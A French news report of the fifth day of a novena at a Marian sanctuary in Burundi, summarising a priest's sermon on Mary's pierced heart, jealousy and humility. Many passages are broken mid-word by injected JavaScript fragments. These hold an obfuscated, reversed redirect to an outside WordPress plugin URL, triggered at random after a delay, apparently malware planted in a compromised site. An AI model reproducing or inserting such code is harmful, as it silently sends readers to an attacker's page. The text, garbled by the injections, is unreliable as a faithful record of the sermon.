Le cinquième jour de la neuvaine, ce mardi 03 décembre 2019, à l’Immaculée conception a débuté par l’Atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration eucharistique. Signalons que le Saint-Sacrement a été exposé par le Recteur du Sanctuaire de la Reine de la Paix et de la Réconciliation, le Père Herménégilde COYITUNGIYE.

Après une demi-heure de contemplation du Christ présent dans l’eucharistie par les fidèles présents, la commission liturgie qui a animé le cinquième jour a entonné le chant d’Alléluia qui exprime la joie de l’assemblée qui va recevoir, du Christ, Verbe incarné, la parole de Dieu.

Le prédicateur du jour, le Père Félicien NIMBONA, a par la suite proclamé la Bonne Nouvelle. Celle-ci a été tirée de l’évangile selon saint Luc en son deuxième chapitre, versets 25 à 35.

Le Père Félicien, se tournant vers le Saint-Sacrement, a débuté son enseignement en informant l’assemblée que Dieu est parmi nous, qu’il est là pour échanger avec nous. Qu’un tel moment est un moment de face à face avec le Christ et qu’il est bon de s’entretenir avec Lui.

 Il a, par après, annoncé le thème du jour à savoir : « le cœur immaculé de Marie a été transpercé pour que le monde ait la paix. » Et pour mieux expliquer comment son cœur immaculé a été transpercé, le Père NIMBONA a jugé bon de parcourir l’Ancien Testament. Ici, il a montré comment le péché d’Adam et Eve, nos premiers parents, leur a attiré de la malédiction, laquelle malédiction a atteint même cette génération. Il a cité de façon explicite la Malédiction du serpent, celle d’Eve et enfin celle d’Adam.

A cause de ces malédictions, le péché a  pris de la place sur la terre. Le prédicateur a beaucoup insisté sur la jalousie, parmi ces péchés, en montrant ses ravages. Comme exemple, il a cité le cas d’Abel qui a été assassiné par son frère à cause de la jalousie. Un autre exemple qu’il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné, c’est le cas de certains burundais qui se lamentent incessamment qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and leurs voisins ont une promotion, s’achètent de nouveaux habits, s’achètent ceci et cela au point de leur vouloir du mal au lieu de prendre la bonne décision de chercher à leur tour ce qui les convient. Il a fait remarquer que souvent la jalousie conduit à la haine et la haine à des tueries. Le Père Félicien a profité de cette occasion pour demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander à l’assemblée d’être des semeurs de paix et d’amour dans leur entourage et de demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander à l’Immaculée conception de les aider.

Il a aussi cité le cas d’Abraham, notre père dans la foi. Il est compté parmi les riches que cette planète ait connus mais à la grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande surprise sa richesse provient de la ruse en faisant passer plusieurs fois sa femme, Sarah, pour sa sœur. La même scène se reproduira pour les enfants d’Isaac qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Jacob, par la ruse, héritera la bénédiction de son frère ainé Esaü. Toujours sur le cas d’Abraham, le prédicateur a mis en garde toutes les femmes afin qu’elles réfléchissent suffisamment avant d’adresser à leurs maris certaines paroles pour ne pas le regretter plus tard. Il a mentionné comme exemple le cas de Sarah qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and il a accordé la permission à son mari d’aller coucher avec Agar pour avoir un fils, Ismaël.

 Le Père NIMBONA a fait savoir que la Vierge Marie a accouché trois fois. Premièrement, elle a accouché le Christ à travers son OUI qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and l’ange Gabriel lui a apparu, une naissance que nous célébrons tous les ans à Noël. Deuxièmement, elle nous a enfantés au pied de la croix et troisièmement, c’est dans la chambre haute après avoir reçu l’Esprit Saint avec les disciples de Jésus. Il a tenu à préciser ici que c’est au pied de la croix que le cœur immaculé de Marie a été brisé comme ça lui a été annoncé par Siméon.

Pour terminer, le Père, a-t-il martelé, soyez toujours humble comme la Vierge. Bannissez d’entre vous l’orgueil. La Vierge a eu la grâce que personne n’a jamais eue au monde mais elle n’a jamais montré un quelconque  orgueil. La prière du chapelet à l’Immaculée conception a clôturé le cinquième jour.

Germain NAHIMANA

Laisser un commentaire